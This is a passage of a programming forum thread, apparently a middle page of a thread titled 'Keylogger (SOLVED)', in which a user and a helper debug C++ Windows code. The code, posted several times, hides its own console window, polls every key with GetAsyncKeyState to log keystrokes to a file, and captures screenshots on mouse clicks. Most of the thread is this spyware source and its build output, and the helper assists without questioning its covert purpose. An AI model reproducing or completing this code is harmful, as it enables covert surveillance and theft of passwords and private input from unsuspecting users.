Keylogger (SOLVED)

Pages: 123

I have a guess, or a hunch to be exact. I think that the problem is with sprintf() not copying the whole thing but instead copying one character only. I'll try to test this and I'll confirm nearly.

Winneris1 (83)

I couldn't do the trick you teached me, I get this when I print pcName "0100F7E8" :/

Computergeek01 (5613)

Feel free to use wsprintf instead if you want to, but sprintf should insert the entire string at '%s'.

Computergeek01 (5613)

Copy and paste your code again. If you're trying to output the instance of 'filename' without writing any data to it then yes you will get garbage for output.

Winneris1 (83)

No I was trying to output the instance "pcName" which should hold "Anas" but it held garbage (I like how my name is garbage now xD)

anyway my code now:

// keylogger test 2.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <Winuser.h>
#include <GdiPlus.h>
#include <time.h>
#include <Lmcons.h>

using namespace std;

void stealth ();
int save (int key_stroke, char *file);

void gdiscreen();
int GetEncoderClsid(const WCHAR* format, CLSID* pClsid);

void getPcName();

int main()
{
	//stealth ();

	wchar_t pcName [20];
	DWORD size = sizeof ( pcName );
	GetComputerName(pcName,&size);

	cout<<pcName;


	//wchar_t directory[200];
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data/images" ,pcName);
	//CreateDirectory (directory, NULL);


	//char filename [200];
	//sprintf_s(filename, "C:/Users/%s/Documents/keylogger/data/Log.txt" ,pcName);


	//while(1==1)
	{
		//for (int keyValue = 0; keyValue < 256; keyValue++)
		{
		 // if (GetAsyncKeyState(keyValue) ==-32767)
		  {
			  //save(keyValue, filename);
			 // break;
		  }
		  
		}
		
	}

	

	system ("PAUSE");
	return 0;
}


void stealth ()
{
	//hides the window
    HWND stealth;
    AllocConsole();
    stealth = FindWindowA("consoleWindowClass", NULL);
    ShowWindow(stealth, 0);
}

int save (int key_stroke, char *file){
    if((key_stroke == 1) || (key_stroke == 2)) 
	{
		gdiscreen();
	}


	else
	{
		FILE *OUTPUT_FILE;
	    OUTPUT_FILE = fopen(file, "a+"); 

   
		if(key_stroke == 18) fprintf(OUTPUT_FILE, "%s", "[ALT] ");	
		else if(key_stroke == 91) fprintf(OUTPUT_FILE, "%s", "[WINDOWS] ");
	    else if(key_stroke == 17) fprintf(OUTPUT_FILE, "%s", "[CONTROL] ");
	    else if(key_stroke == 16) fprintf(OUTPUT_FILE, "%s", "[SHIFT] ");
	    else if(key_stroke == 20) fprintf(OUTPUT_FILE, "%s", "[CAPS LOCK] ");
	    else if(key_stroke == 9)   fprintf(OUTPUT_FILE, "%s", "[TAB] ");
	    else if(key_stroke == 36) fprintf(OUTPUT_FILE, "%s", "[HOME] ");
	    else if(key_stroke == 35) fprintf(OUTPUT_FILE, "%s", "[END] ");
	    else if(key_stroke == 46) fprintf(OUTPUT_FILE, "%s", "[DELETE] ");
	    else if(key_stroke == 33) fprintf(OUTPUT_FILE, "%s", "[PAGE UP] ");
	    else if(key_stroke == 45) fprintf(OUTPUT_FILE, "%s", "[INSERT] ");
	    else if(key_stroke == 34) fprintf(OUTPUT_FILE, "%s", "[PAGE DOWN] ");

	    else fprintf(OUTPUT_FILE, "%s", &key_stroke);

		fclose(OUTPUT_FILE);
		cout << key_stroke << endl;
	}

return 0;
}



void gdiscreen()
{
	using namespace Gdiplus;
	GdiplusStartupInput gdiplusStartupInput;
	ULONG_PTR gdiplusToken;
	GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);

	{
		

		wchar_t pcName [20];
		DWORD size = sizeof ( pcName );
		GetComputerName(pcName,&size);

		SYSTEMTIME st;
		GetLocalTime(&st);
		wchar_t filename[200];
		memset(filename,0,sizeof(filename));
		wsprintfW(filename, L"C:/Users/%s/Documents/keylogger/data/images/%04d-%02d-%02d %02d-%02d-%02d_%03d.jpeg" ,pcName ,st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);

		HDC scrdc, memdc;
		HBITMAP membit;
		scrdc = ::GetDC(0);
		int Height = GetSystemMetrics(SM_CYSCREEN);
		int Width = GetSystemMetrics(SM_CXSCREEN);
		memdc = CreateCompatibleDC(scrdc);
		membit = CreateCompatibleBitmap(scrdc, Width, Height);
		HBITMAP hOldBitmap =(HBITMAP) SelectObject(memdc, membit);
		BitBlt(memdc, 0, 0, Width, Height, scrdc, 0, 0, SRCCOPY);

		Gdiplus::Bitmap bitmap(membit, NULL);
		CLSID clsid;
		GetEncoderClsid(L"image/jpeg", &clsid);
		bitmap.Save(filename , &clsid);

		SelectObject(memdc, hOldBitmap);

		DeleteObject(memdc);

		DeleteObject(membit);

		::ReleaseDC(0,scrdc);
	}

	GdiplusShutdown(gdiplusToken);
}

int GetEncoderClsid(const WCHAR* format, CLSID* pClsid)
{
	using namespace Gdiplus;
	UINT  num = 0;          // number of image encoders
	UINT  size = 0;         // size of the image encoder array in bytes

	ImageCodecInfo* pImageCodecInfo = NULL;

	GetImageEncodersSize(&num, &size);
	if(size == 0)
		return -1;  // Failure

	pImageCodecInfo = (ImageCodecInfo*)(malloc(size));
	if(pImageCodecInfo == NULL)
		return -1;  // Failure

	GetImageEncoders(num, size, pImageCodecInfo);

	for(UINT j = 0; j < num; ++j)
	{
		if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 )
		{
			*pClsid = pImageCodecInfo[j].Clsid;
			free(pImageCodecInfo);
			return j;  // Success
		}    
	}

	free(pImageCodecInfo);
	return 0;
}

Computergeek01 (5613)

Replace Line 28 with:

if(!GetComputerName(pcName,&size))
{
    cout << "Size: " << size << "\tError Code: " << GetLastError() << std::endl;
}

EDIT: You can look up the Error code here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx or just post it and I'll look it up.

Last edited on

Winneris1 (83)

I assumed you also wanted me to remove line 30 so I did. After doing what you asked, I get nothing now(Except "Press any key to continue...").

Last edited on

Computergeek01 (5613)

I should have tried to compile this myself earlier, 'pcName' should be a TCHAR not a wchar_t data type.

Winneris1 (83)

Did that. Still nothing.

Computergeek01 (5613)

Did you put cout << pcName; back?

Winneris1 (83)

No you didn't tell me to, should I? And in the same line it was before?
If I do put it back to line 30 I get the garbage again.

Last edited on

Computergeek01 (5613)

Put it back underneath the code I had you put in before don't overwrite anything the physical line number doesn't really mean anything:

if(!GetComputerName(pcName,&size))
{
    cout << "Size: " << size << "\tError Code: " << GetLastError() << std::endl;
}

cout << pcName;

This is just a check to see what is inside pcName. When this comes back with the data we expect we will uncomment out the rest of the code.

Last edited on

Winneris1 (83)

It prints 00DAF888.

Computergeek01 (5613)

Here is what I have:

int main()
{
	//stealth ();

	TCHAR pcName [250];
	DWORD size = 20;

	if(!GetComputerName(pcName,&size))
       {
            cout << "Size: " << size << "\tError Code: " << GetLastError() << std::endl;
       }

   cout << pcName << std::endl;


	//wchar_t directory[200];
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data/images" ,pcName);
	//CreateDirectory (directory, NULL);


	//char filename [200];
	//sprintf_s(filename, "C:/Users/%s/Documents/keylogger/data/Log.txt" ,pcName);


	//while(1==1)
	{
		//for (int keyValue = 0; keyValue < 256; keyValue++)
		{
		 // if (GetAsyncKeyState(keyValue) ==-32767)
		  {
			  //save(keyValue, filename);
			 // break;
		  }

		}

	}



	system ("PAUSE");
	return 0;
}

And I'm getting the right answer.

EDIT: Spacing.

Last edited on

Winneris1 (83)

What is the right answer, because the output seems to change everytime I run the program?

Computergeek01 (5613)

The "right answer" is that this should output the name of your PC. If it's not outputting that we need to call GetLastError() and have you post what that comes back with.

Winneris1 (83)

It comes back with nothing. Anyway, I tried copyin the code and pasting it into a new project and this is what I get when I build it:

1>------ Build started: Project: keylogger test, Configuration: Debug Win32 ------
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdiplusShutdown@4 referenced in function "void __cdecl gdiscreen(void)" (?gdiscreen@@YAXXZ)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdiplusStartup@12 referenced in function "void __cdecl gdiscreen(void)" (?gdiscreen@@YAXXZ)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipSaveImageToFile@16 referenced in function "public: enum Gdiplus::Status __thiscall Gdiplus::Image::Save(wchar_t const *,struct _GUID const *,class Gdiplus::EncoderParameters const *)" (?Save@Image@Gdiplus@@QAE?AW4Status@2@PB_WPBU_GUID@@PBVEncoderParameters@2@@Z)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipDisposeImage@4 referenced in function "public: virtual __thiscall Gdiplus::Image::~Image(void)" (??1Image@Gdiplus@@UAE@XZ)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipFree@4 referenced in function "public: static void __cdecl Gdiplus::GdiplusBase::operator delete(void *)" (??3GdiplusBase@Gdiplus@@SAXPAX@Z)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipCloneImage@8 referenced in function "public: virtual class Gdiplus::Image * __thiscall Gdiplus::Image::Clone(void)" (?Clone@Image@Gdiplus@@UAEPAV12@XZ)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipAlloc@4 referenced in function "public: static void * __cdecl Gdiplus::GdiplusBase::operator new(unsigned int)" (??2GdiplusBase@Gdiplus@@SAPAXI@Z)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipCreateBitmapFromHBITMAP@12 referenced in function "public: __thiscall Gdiplus::Bitmap::Bitmap(struct HBITMAP__ *,struct HPALETTE__ *)" (??0Bitmap@Gdiplus@@QAE@PAUHBITMAP__@@PAUHPALETTE__@@@Z)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipGetImageEncodersSize@8 referenced in function "enum Gdiplus::Status __cdecl Gdiplus::GetImageEncodersSize(unsigned int *,unsigned int *)" (?GetImageEncodersSize@Gdiplus@@YA?AW4Status@1@PAI0@Z)
1>keylogger test.obj : error LNK2019: unresolved external symbol _GdipGetImageEncoders@12 referenced in function "enum Gdiplus::Status __cdecl Gdiplus::GetImageEncoders(unsigned int,unsigned int,class Gdiplus::ImageCodecInfo *)" (?GetImageEncoders@Gdiplus@@YA?AW4Status@1@IIPAVImageCodecInfo@1@@Z)
1>C:\Users\Anas\Documents\Visual Studio 2010\Projects\keylogger test\Debug\keylogger test.exe : fatal error LNK1120: 10 unresolved externals
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

Computergeek01 (5613)

That's because I just copy and pasted the main function. I left out your others because we are not working on them right now. The errors you see here are due to you not linking to GDIPlus. I also don't have any headers in my last post.

Last edited on

Winneris1 (83)

Ok, going back to the first project it still just shows garbage such as 010CFB8C here's my code again:

// keylogger test 2.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <Winuser.h>
#include <GdiPlus.h>
#include <time.h>
#include <Lmcons.h>

using namespace std;

void stealth ();
int save (int key_stroke, char *file);

void gdiscreen();
int GetEncoderClsid(const WCHAR* format, CLSID* pClsid);

void getPcName();

int main()
{
	//stealth ();

	TCHAR pcName [250];
	DWORD size = 20;

	if(!GetComputerName(pcName,&size))
	{
		cout << "Size: " << size << "\tError Code: " << GetLastError() << std::endl;
	}
	

	cout << pcName << std::endl;


	//wchar_t directory[200];
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data" ,pcName);
	//CreateDirectory (directory, NULL);
	//wsprintfW(directory, L"C:/Users/%s/Documents/keylogger/data/images" ,pcName);
	//CreateDirectory (directory, NULL);


	//char filename [200];
	//sprintf_s(filename, "C:/Users/%s/Documents/keylogger/data/Log.txt" ,pcName);


	//while(1==1)
	{
		//for (int keyValue = 0; keyValue < 256; keyValue++)
		{
		  //if (GetAsyncKeyState(keyValue) ==-32767)
		  {
			  //save(keyValue, filename);
			  //break;
		  }
		  
		}
		
	}

	

	system ("PAUSE");
	return 0;
}


void stealth ()
{
	//hides the window
    HWND stealth;
    AllocConsole();
    stealth = FindWindowA("consoleWindowClass", NULL);
    ShowWindow(stealth, 0);
}

int save (int key_stroke, char *file){
    if((key_stroke == 1) || (key_stroke == 2)) 
	{
		gdiscreen();
	}


	else
	{
		FILE *OUTPUT_FILE;
	    OUTPUT_FILE = fopen(file, "a+"); 

   
		if(key_stroke == 18) fprintf(OUTPUT_FILE, "%s", "[ALT] ");	
		else if(key_stroke == 91) fprintf(OUTPUT_FILE, "%s", "[WINDOWS] ");
	    else if(key_stroke == 17) fprintf(OUTPUT_FILE, "%s", "[CONTROL] ");
	    else if(key_stroke == 16) fprintf(OUTPUT_FILE, "%s", "[SHIFT] ");
	    else if(key_stroke == 20) fprintf(OUTPUT_FILE, "%s", "[CAPS LOCK] ");
	    else if(key_stroke == 9)   fprintf(OUTPUT_FILE, "%s", "[TAB] ");
	    else if(key_stroke == 36) fprintf(OUTPUT_FILE, "%s", "[HOME] ");
	    else if(key_stroke == 35) fprintf(OUTPUT_FILE, "%s", "[END] ");
	    else if(key_stroke == 46) fprintf(OUTPUT_FILE, "%s", "[DELETE] ");
	    else if(key_stroke == 33) fprintf(OUTPUT_FILE, "%s", "[PAGE UP] ");
	    else if(key_stroke == 45) fprintf(OUTPUT_FILE, "%s", "[INSERT] ");
	    else if(key_stroke == 34) fprintf(OUTPUT_FILE, "%s", "[PAGE DOWN] ");

	    else fprintf(OUTPUT_FILE, "%s", &key_stroke);

		fclose(OUTPUT_FILE);
		cout << key_stroke << endl;
	}

return 0;
}



void gdiscreen()
{
	using namespace Gdiplus;
	GdiplusStartupInput gdiplusStartupInput;
	ULONG_PTR gdiplusToken;
	GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);

	{
		

		wchar_t pcName [20];
		DWORD size = sizeof ( pcName );
		GetComputerName(pcName,&size);

		SYSTEMTIME st;
		GetLocalTime(&st);
		wchar_t filename[200];
		memset(filename,0,sizeof(filename));
		wsprintfW(filename, L"C:/Users/%s/Documents/keylogger/data/images/%04d-%02d-%02d %02d-%02d-%02d_%03d.jpeg" ,pcName ,st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);

		HDC scrdc, memdc;
		HBITMAP membit;
		scrdc = ::GetDC(0);
		int Height = GetSystemMetrics(SM_CYSCREEN);
		int Width = GetSystemMetrics(SM_CXSCREEN);
		memdc = CreateCompatibleDC(scrdc);
		membit = CreateCompatibleBitmap(scrdc, Width, Height);
		HBITMAP hOldBitmap =(HBITMAP) SelectObject(memdc, membit);
		BitBlt(memdc, 0, 0, Width, Height, scrdc, 0, 0, SRCCOPY);

		Gdiplus::Bitmap bitmap(membit, NULL);
		CLSID clsid;
		GetEncoderClsid(L"image/jpeg", &clsid);
		bitmap.Save(filename , &clsid);

		SelectObject(memdc, hOldBitmap);

		DeleteObject(memdc);

		DeleteObject(membit);

		::ReleaseDC(0,scrdc);
	}

	GdiplusShutdown(gdiplusToken);
}

int GetEncoderClsid(const WCHAR* format, CLSID* pClsid)
{
	using namespace Gdiplus;
	UINT  num = 0;          // number of image encoders
	UINT  size = 0;         // size of the image encoder array in bytes

	ImageCodecInfo* pImageCodecInfo = NULL;

	GetImageEncodersSize(&num, &size);
	if(size == 0)
		return -1;  // Failure

	pImageCodecInfo = (ImageCodecInfo*)(malloc(size));
	if(pImageCodecInfo == NULL)
		return -1;  // Failure

	GetImageEncoders(num, size, pImageCodecInfo);

	for(UINT j = 0; j < num; ++j)
	{
		if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 )
		{
			*pClsid = pImageCodecInfo[j].Clsid;
			free(pImageCodecInfo);
			return j;  // Success
		}    
	}

	free(pImageCodecInfo);
	return 0;
}

Winneris1 (83)

If I remove the "!" before "GetComputerName(pcName,&size)" then size is 4 my pc name is "Anas" so am assuming that's correct and the error code is 203

Last edited on

Pages: 123